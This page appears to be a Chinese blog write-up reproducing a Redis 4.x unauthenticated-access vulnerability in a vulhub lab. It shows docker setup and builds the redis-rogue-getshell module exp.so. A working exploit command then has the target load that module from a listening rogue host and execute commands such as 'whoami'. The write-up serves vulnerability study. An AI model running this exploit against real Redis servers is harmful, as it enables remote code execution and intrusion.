当前位置: 首页 > article >正文

vulhub redis-4-unacc

环境搭建

cd vulhub/redis/4-unacc
docker-compose up -d

漏洞复现

检测

redis-cli -h ip

使用redis工具

工具地址:https://github.com/vulhub/redis-rogue-getshell

下载完成后,先进入RedisModulesSDK/exp/ 目录进行make操作

获得exp.so后可以进行命令执行

cd回redis-rogue-getshell-master/路径

命令执行

whoami

python3 redis-master.py -r 192.168.41.130 -p 6379 -L 192.168.41.130 -P 8888 -f RedisModulesSDK/exp/exp.so -c "whoami"

uname -a


http://www.kler.cn/a/133729.html

相关文章:

  • dapp获取钱包地址,及签名
  • 问:MySQL主从同步的机制梳理?
  • 游戏引擎学习第七天
  • 【Pikachu】越权访问实战
  • 信息网络安全——AES加密算法
  • 全球碳循环数据集(2000-2023)包括总初级生产力、生态系统净碳交换和生态系统呼吸变量
  • ​软考-高级-系统架构设计师教程(清华第2版)【第14章 云原生架构设计理论与实践(P496~526)-思维导图】​
  • 文本向量化
  • PTA-6-42 设计门票(抽象类)
  • [C/C++] 数据结构 LeetCode:用队列实现栈
  • 【碰碰球】弹珠游戏-微信小程序项目开发流程详解
  • 【短文】【踩坑】可以在Qt Designer给QTableWidge添加右键菜单吗?
  • 最长回文子序列 递归与动态规划
  • 【精选】项目管理工具——Maven详解
  • STM32的启动流程
  • 数据双向 双向数据绑定
  • 【Promise12数据集】Promise12数据集介绍和预处理
  • odoo16前端框架源码阅读——env.js
  • 深度优化数据库性能:Linux 内核参数调整解析
  • ChatGPT 从零到一打造私人智能英语学习助手
  • 【JavaEE初阶】计算机是如何工作的
  • Leetcode经典题目之“双指针交换元素“类题目
  • 基于SSM的古董拍卖系统
  • 基础组件-流量回放平台设计
  • 单线程的JS中Vue导致的“线程安全”问题
  • 【FPGA】Verilog:实现 RS 触发器 | Flip-Flop | 使用 NOR 的 RS 触发器 | 使用 NAND 的 RS 触发器